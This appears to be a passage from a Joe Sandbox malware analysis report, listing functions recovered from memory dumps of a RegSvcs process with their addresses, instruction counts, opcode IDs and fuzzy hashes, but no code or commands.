                                                          Function 066B4C31 Relevance: .1, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bc7145ef79396c1612b619c66d6f987117e0697ae4d1f7df8efa5db5de592fbf
                                                          • Instruction ID: 9c7cead9ba809d3050fc8e395d1f4d2532124093370cb2c7fc0e6df899e91148
                                                          • Opcode Fuzzy Hash: bc7145ef79396c1612b619c66d6f987117e0697ae4d1f7df8efa5db5de592fbf
                                                          • Instruction Fuzzy Hash: 86418030F102099FDB549FA9C814BAEBAF6FF88700F208529E106AB398DF754C45CB90
                                                          Function 066B54E8 Relevance: .1, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35c1f30b51f52ef4ed1b11aa620fcb2a63dd0f22f9931379c02b1f8eaaedf771
                                                          • Instruction ID: 54546a4c5ed42ba0723387db679de57ad1e59fab42b6dd1b0b52b671e47bfae9
                                                          • Opcode Fuzzy Hash: 35c1f30b51f52ef4ed1b11aa620fcb2a63dd0f22f9931379c02b1f8eaaedf771
                                                          • Instruction Fuzzy Hash: 04417272E00609CFDF70CEAAD880AEFFBB6FB45210F10592AD156D7650D731E9858B91
                                                          Function 066BDB75 Relevance: .1, Instructions: 128COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aac5aed2fc4fb78c1f34de7f685458bcb05dba0b2aac9433a9430e64b377d3e7
                                                          • Instruction ID: 3c3ae31276251641f6eaa1922491a2897231d68d6218f45acb7fee0bf827e18d
                                                          • Opcode Fuzzy Hash: aac5aed2fc4fb78c1f34de7f685458bcb05dba0b2aac9433a9430e64b377d3e7
                                                          • Instruction Fuzzy Hash: A5419D70E0030ADFDB64DFA4D844AEEBBB6BF85644F208529E415EB344DB71D882CB91
                                                          Function 066B229D Relevance: .1, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8027540c25a439ca67695d404bf3cdcca2dc90143c40b94bdf1d7eb0e1862a1a
                                                          • Instruction ID: 9749d0e15e7c089d55c8b537bb58c2670f68421b6b11f723047dc0d143f06477
                                                          • Opcode Fuzzy Hash: 8027540c25a439ca67695d404bf3cdcca2dc90143c40b94bdf1d7eb0e1862a1a
                                                          • Instruction Fuzzy Hash: A2310330B00206CFDB58AB74D5646AE7BE6BB89610F148578D402DB398DF36CD82CB91
                                                          Function 066B22B0 Relevance: .1, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f4bb2870372def2856daa7061060df3a0f02312c5a080f7ed28494531ad0df07
                                                          • Instruction ID: 413ee435987da2097c66d6682573e8c7658459fd5a2a64dd011a64ff390adeb6
                                                          • Opcode Fuzzy Hash: f4bb2870372def2856daa7061060df3a0f02312c5a080f7ed28494531ad0df07
                                                          • Instruction Fuzzy Hash: 7131CF30B00206CFDB58AB78D5246AF77E6BB88614F209578D416DB358DF36DD82CB91
                                                          Function 066B2160 Relevance: .1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67330d07984e009ce3708988b0d0fa9b88fee17ce73a195f622075aeed41f1fb
                                                          • Instruction ID: dbc56baf71c99eada2a2796d92e12640a6516e5e022418e5657c0a237e7f6466
                                                          • Opcode Fuzzy Hash: 67330d07984e009ce3708988b0d0fa9b88fee17ce73a195f622075aeed41f1fb
                                                          • Instruction Fuzzy Hash: 6B318135E1020ADBCB55CFA4C8646EEBBF6BF89310F148529E916EB340DB71AD42CB40
                                                          Function 066B5660 Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2581e5ffe54e6266610a17fb7dbd8fe24baddbc3c39a974a41fdf89abdc4143b
                                                          • Instruction ID: cebe58e1450b65215c4ea306c37fa2ace796cd56a22dfe6db69cd67ce92ab372
                                                          • Opcode Fuzzy Hash: 2581e5ffe54e6266610a17fb7dbd8fe24baddbc3c39a974a41fdf89abdc4143b
                                                          • Instruction Fuzzy Hash: 89319234E10205CFDF708FA9C880AEEBBB2FB45210F10982AE556DB391D675D981DB91
                                                          Function 066B2170 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 893a00c1df04b9fea2f175f93338a8fbc3ed72ba236c1a933b33800ac37990b1
                                                          • Instruction ID: 105389daff06a5f9af9486033f378ccbdd3dc90c2d47a9e8e610944b2990533e
                                                          • Opcode Fuzzy Hash: 893a00c1df04b9fea2f175f93338a8fbc3ed72ba236c1a933b33800ac37990b1
                                                          • Instruction Fuzzy Hash: B8318334E1020ADBCB55CF64D8646AEB7F6BF89700F148529E906EB340DB71ED82CB40
                                                          Function 066B3B79 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 369d82e9beede89e9ecf026b43c2cc68155d8a06a2443ca555c3e2c9aacd3f60
                                                          • Instruction ID: ebab3a4b5c41b10fd6d9e27724baef39510f03f6f0b7de36379f264dcc389948
                                                          • Opcode Fuzzy Hash: 369d82e9beede89e9ecf026b43c2cc68155d8a06a2443ca555c3e2c9aacd3f60
                                                          • Instruction Fuzzy Hash: F2217575F11619DFDB90DFA9E940AEEBBF5EB88310F108025E905E7384EB31D9818B90
                                                          Function 066B3B88 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d27cd6f4e80534885daefb2e4c44799d5055a9a52656ed07e3abf36a0722773b
                                                          • Instruction ID: 429aa774783b9961a364833d2e5b214ea209d33d4cff4411d8ff1bdab9e2ee5e
                                                          • Opcode Fuzzy Hash: d27cd6f4e80534885daefb2e4c44799d5055a9a52656ed07e3abf36a0722773b
                                                          • Instruction Fuzzy Hash: B2216675F01619DFDB90DFA9D980AEEBBF1EB88710F109029E905E7354EB31D9418B90
                                                          Function 0112D3BC Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3873577256.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_112d000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 110805b16de8850a9b129fa6e611fbd689ee18c7eaa2c2f2d9cca8dec480fd66
                                                          • Instruction ID: a283207fb1812c723096d9cb098cecb70e4c8281c8c3d925e66c28a4b05d92ff
                                                          • Opcode Fuzzy Hash: 110805b16de8850a9b129fa6e611fbd689ee18c7eaa2c2f2d9cca8dec480fd66
                                                          • Instruction Fuzzy Hash: 222107B1504384DFDF09DF54E9C0B26BB65FB84314F24C56DD8094B686C376E456CA62
                                                          Function 0112D044 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3873577256.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_112d000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a2fa34128fa416856d59e0296f18d6cb9f1d4770b1f2fb4b16736934b9f22f88
                                                          • Instruction ID: 987777c755d43fb183947033a7be2ab09809280f5ed4596394178ae06b1ad4a4
                                                          • Opcode Fuzzy Hash: a2fa34128fa416856d59e0296f18d6cb9f1d4770b1f2fb4b16736934b9f22f88
                                                          • Instruction Fuzzy Hash: 11210471504304EFDF19DFA4E9C0B26BB65FB84314F24C5ADE8494B262C73AD866CA62
                                                          Function 0112D20C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3873577256.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_112d000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9198eeb5507beafd0697fd12a7bd296df724220e6d3440429f74ee47174bbf3d
                                                          • Instruction ID: 811ab1ebc4ecb9818fffd24e798ae506504dc0b8b9c2f3cf02b7b0d25c1e7506
                                                          • Opcode Fuzzy Hash: 9198eeb5507beafd0697fd12a7bd296df724220e6d3440429f74ee47174bbf3d
                                                          • Instruction Fuzzy Hash: 752135B2504344EFDF09DF94E8C4B26BB65FBC5334F24C669E8490B242C376D826CA62
                                                          Function 066B3C98 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4beedb0da0d3adb9c329fffef7556926e279b4a094ba02ecaa3e56c838d5d056
                                                          • Instruction ID: 7051646e514c393ab49d823637a5132ea94409f7359b51871d8a64ec38f0605c
                                                          • Opcode Fuzzy Hash: 4beedb0da0d3adb9c329fffef7556926e279b4a094ba02ecaa3e56c838d5d056
                                                          • Instruction Fuzzy Hash: 6B115E31B101299FDF549A69D8146FE73EAEBC8710B144539D506EB354EB25DC028BD1
                                                          Function 066B3951 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3e3d55025b646a592874c6ec4e6b981d54edb1511d56300b39df1b109ddeffe
                                                          • Instruction ID: 00c7afcd28c12d9a951749d2abb130a2e06aaa1237f8b295abc826a6314e1400
                                                          • Opcode Fuzzy Hash: a3e3d55025b646a592874c6ec4e6b981d54edb1511d56300b39df1b109ddeffe
                                                          • Instruction Fuzzy Hash: 7221DEB5901619EFCB00DF9AD884ACEFBB8FB48224F10822AE518A7340D7756944CBA5
                                                          Function 066BEE3F Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5e8aec225a790d19cdbdbeeca7edb6cf1280fd212ee34dacb3682088f96ac608
                                                          • Instruction ID: 9748975ced8b56f078f98e3e0541de73ca3d8b35ada57b84667188fb29fd1c6c
                                                          • Opcode Fuzzy Hash: 5e8aec225a790d19cdbdbeeca7edb6cf1280fd212ee34dacb3682088f96ac608
                                                          • Instruction Fuzzy Hash: A0012834B052518BCB25963CD864BEF7BD6DBCA654F14883EE14AC7341DA16DC434392
                                                          Function 066B42D8 Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c693d4fc4c3bc152b4e4e5b8ce59f17f777ead5d141026a4b45b8b649e782b28
                                                          • Instruction ID: 20aeca835b1d7d85b6775e27b9bbb69f450099e77907d26552c8373215997e2b
                                                          • Opcode Fuzzy Hash: c693d4fc4c3bc152b4e4e5b8ce59f17f777ead5d141026a4b45b8b649e782b28
                                                          • Instruction Fuzzy Hash: BC012831F041104BDB54D67EE42479EB7D7DBC9610F18843AE50ACB34AED21CC014385
                                                          Function 066BA3CA Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9d29a1271242205bd6baf8db2d927084a07685ad52895c5163f9cfccf555f32d
                                                          • Instruction ID: ce064e40456a283f0fea8a8d3a7c05cd09564b0a9e76e86387e00d565119335d
                                                          • Opcode Fuzzy Hash: 9d29a1271242205bd6baf8db2d927084a07685ad52895c5163f9cfccf555f32d
                                                          • Instruction Fuzzy Hash: BC012B30B121148FCB64DABCE864B9B77D5DB85B10F108439F10AC7344EE21DD4187D5
                                                          Function 066B3C8A Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 04da2a4905548c03f053483083715e02df5edf493fdc706162b25536f08fef96
                                                          • Instruction ID: 0e3c1dd76c5c09a8fd7c3a470a8a81156da63a0bdda4ab585dea5364e8f7361e
                                                          • Opcode Fuzzy Hash: 04da2a4905548c03f053483083715e02df5edf493fdc706162b25536f08fef96
                                                          • Instruction Fuzzy Hash: 45017C32B210299BDF98A669EC14AEB76AAEB88710F55413AD506E7344EF61880247E1
                                                          Function 0112D3B7 Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3873577256.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_112d000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                          • Instruction ID: 8797a7ef489c8430c83148b14e24b8d2411f639e08c8f712dfd668788282a30a
                                                          • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                          • Instruction Fuzzy Hash: 1E11EE75504280DFCB0ACF14E5C0B15BF61FB44214F24C6AAD8494BA52C33AE41ACB92
                                                          Function 0112D03F Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3873577256.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_112d000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                          • Instruction ID: 3da1aae0583631fd0f86aae9d96604622306b9b74c6d046470eafd717396e92f
                                                          • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                          • Instruction Fuzzy Hash: DD11BB75504284DFCB1ACF64D9C4B15BFA2FB84314F24C6A9D8494B662C33AD45ACF62
                                                          Function 0112D207 Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3873577256.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_112d000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0087aa9c0370ffbcc44a91c72dac69a08dec4055da452c00f01411939cf63ad0
                                                          • Instruction ID: 3bb97eac10147a4b8350ece9d5846eee2051f7949d36abd0660beb04355804cb
                                                          • Opcode Fuzzy Hash: 0087aa9c0370ffbcc44a91c72dac69a08dec4055da452c00f01411939cf63ad0
                                                          • Instruction Fuzzy Hash: C611EF76504284DFDB06CF54E5C4B16FF61FB85324F24C6AAD8490B646C33AD41ACBA2
                                                          Function 066B3958 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4a10989e3e2597be990c6f1d7af45b803b403cacc4282468f08c81ab8b3633dd
                                                          • Instruction ID: c46f9a0865614dcb0fc5ab62d1eb7d4b3654d681444aa1124139355e4239bc13
                                                          • Opcode Fuzzy Hash: 4a10989e3e2597be990c6f1d7af45b803b403cacc4282468f08c81ab8b3633dd
                                                          • Instruction Fuzzy Hash: 3A11CFB5D01659EFDB00DF9AD884ADEFBB4FB48314F10812AE918A7300D374A944CBA5
                                                          Function 066B42E8 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 986eb002daf2f6f35b7ac35039827cdb7e0735506e6c6721bf8ecb5e444a1483
                                                          • Instruction ID: 4defd14465144b9919c8f756a07ace2031511091adb37e12fa7ffae8b1676f2f
                                                          • Opcode Fuzzy Hash: 986eb002daf2f6f35b7ac35039827cdb7e0735506e6c6721bf8ecb5e444a1483
                                                          • Instruction Fuzzy Hash: BD01D631F001118BDB64D56ED4247AFB2DBDBC9B20F18843AE10EC734AED61DC424385
                                                          Function 066BEE50 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 05d7137b1e93d413f69e76dec82a9514073a471daf8396fe638126828c31a100
                                                          • Instruction ID: 19c342390f15a1f30e048cd2ba97b2f527511ac5aa9231f416fdca956be47d3d
                                                          • Opcode Fuzzy Hash: 05d7137b1e93d413f69e76dec82a9514073a471daf8396fe638126828c31a100
                                                          • Instruction Fuzzy Hash: 6101AF35B105118BDB64967CD464BAF77DAEBC9B60F14883AE60EC7344EE26DC434385
                                                          Function 066BA3D8 Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 671242193d12e7e88afde0fe14b226e811c76bb4d0b4275fa169efb2f529edf0
                                                          • Instruction ID: f111b09870acf0d9a3c03d1766741cb51089883d7a388535e347ec33851b5757
                                                          • Opcode Fuzzy Hash: 671242193d12e7e88afde0fe14b226e811c76bb4d0b4275fa169efb2f529edf0
                                                          • Instruction Fuzzy Hash: 3501AF30B111158FDB64EABCE564BAA73D6EBC9B24F109439E60EC7344EE21EC428785
                                                          Function 066BC880 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d6c9682ab6f952a881c9cafeee2612e9be08bd230a4a85b6b9a04200dfe525d
                                                          • Instruction ID: 97340c6c7828cc674c090d9ea78bfad92b28b714d9b9ec25ddcd971299e2bc78
                                                          • Opcode Fuzzy Hash: 5d6c9682ab6f952a881c9cafeee2612e9be08bd230a4a85b6b9a04200dfe525d
                                                          • Instruction Fuzzy Hash: 44F02431B21238BBCB609636DC00ECF7B3AE780B64F000029F901E7780DB22A942CBD0
                                                          Function 0111D8C5 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3873513135.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_111d000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 528399f58177219594b232f6091e686b3b3ed5c3b31748306ce3fd536855cecf
                                                          • Instruction ID: 1da9d2768d360b92753fbfe938c535d7118c7bcf3ec10ff50818291cea1cfa5b
                                                          • Opcode Fuzzy Hash: 528399f58177219594b232f6091e686b3b3ed5c3b31748306ce3fd536855cecf
                                                          • Instruction Fuzzy Hash: 8101FC31004748AAEF184EA9EC88B57FF99EF41620F04C46AED080A14BD3389400CA72
                                                          Function 0111D8C4 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3873513135.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_111d000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 519df30d08ed1a427941e8158bd95c90f6cb117d342f93a4e22064e7925fa634
                                                          • Instruction ID: c667a8d190da9a417d458e86940a821a7d55c88f145777d924f406f2003f3560
                                                          • Opcode Fuzzy Hash: 519df30d08ed1a427941e8158bd95c90f6cb117d342f93a4e22064e7925fa634
                                                          • Instruction Fuzzy Hash: CDF06271404744AEEB158E1ADC88B66FFD9EB41634F18C45AED484A28BD3799844CA71
                                                          Function 066BAFE0 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f1b59142a5c316b992656f178079429b2f664aacbc11f1124c474d039e1e3249
                                                          • Instruction ID: 62535581df01a29125d49af9ba5c8773fc37a3e97557f99725a8c850f01ab579
                                                          • Opcode Fuzzy Hash: f1b59142a5c316b992656f178079429b2f664aacbc11f1124c474d039e1e3249
                                                          • Instruction Fuzzy Hash: 9BE0DF32E1022C9BDF3499A9D8045EEBBBDE785720F00043AEA1AE7300D931AC0583D1
                                                          Function 066B6540 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0525a14db3bb238371f99142228926c4f230decbf5fea959d3af6f3e59cf1839
                                                          • Instruction ID: 1c732023db51085c05b305e06eab1f2b5efe9e41fb0e2984f3e90a1190cc8181
                                                          • Opcode Fuzzy Hash: 0525a14db3bb238371f99142228926c4f230decbf5fea959d3af6f3e59cf1839
                                                          • Instruction Fuzzy Hash: 49E06872E04248EBDB20CA74DE0979A3F6CD702214F1085F6E804DB303E132CD418751